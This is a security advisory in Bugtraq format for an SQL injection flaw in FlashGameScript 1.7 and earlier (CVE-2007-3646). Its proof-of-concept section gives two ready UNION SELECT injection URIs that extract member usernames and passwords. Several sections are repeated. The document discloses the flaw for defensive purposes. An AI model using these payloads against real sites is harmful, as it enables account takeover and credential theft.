FlashGameScript Member.PHP SQL Injection Vulnerability
BID:24809
Info
FlashGameScript Member.PHP SQL Injection Vulnerability
| Bugtraq ID: | 24809 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-3646 |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 07 2007 12:00AM |
| Updated: | May 07 2015 05:37PM |
| Credit: | Xenduer77 is credited with the discovery of this vulnerability. |
| Vulnerable: |
FlashGameScript FlashGameScript 1.5.4 FlashGameScript FlashGameScript 1.7 |
| Not Vulnerable: | |
Discussion
FlashGameScript Member.PHP SQL Injection Vulnerability
FlashGameScript is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
FlashGameScript 1.7 and prior versions are vulnerable to this issue.
FlashGameScript is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
FlashGameScript 1.7 and prior versions are vulnerable to this issue.
Exploit / POC
FlashGameScript Member.PHP SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URIs are available:
http://www.example.com/index.php?func=member&user='+union+select+0,0,0,0,0,0,0,0,0,0,username,password,0,0,0,0,0,user_type+from+members+where+user_type=2/*
http://www.example.com/index.php?func=member&user='+union+select+0,0,0,0,0,0,0,0,0,0,username,password,0,0,0,0,user_type+from+members+where+user_type=2/*
Attackers can use a browser to exploit this issue.
The following example URIs are available:
http://www.example.com/index.php?func=member&user='+union+select+0,0,0,0,0,0,0,0,0,0,username,password,0,0,0,0,0,user_type+from+members+where+user_type=2/*
http://www.example.com/index.php?func=member&user='+union+select+0,0,0,0,0,0,0,0,0,0,username,password,0,0,0,0,user_type+from+members+where+user_type=2/*
Solution / Fix
FlashGameScript Member.PHP SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
FlashGameScript Member.PHP SQL Injection Vulnerability
References:
References:
- FlashGameScript Homepage (FlashGameScript)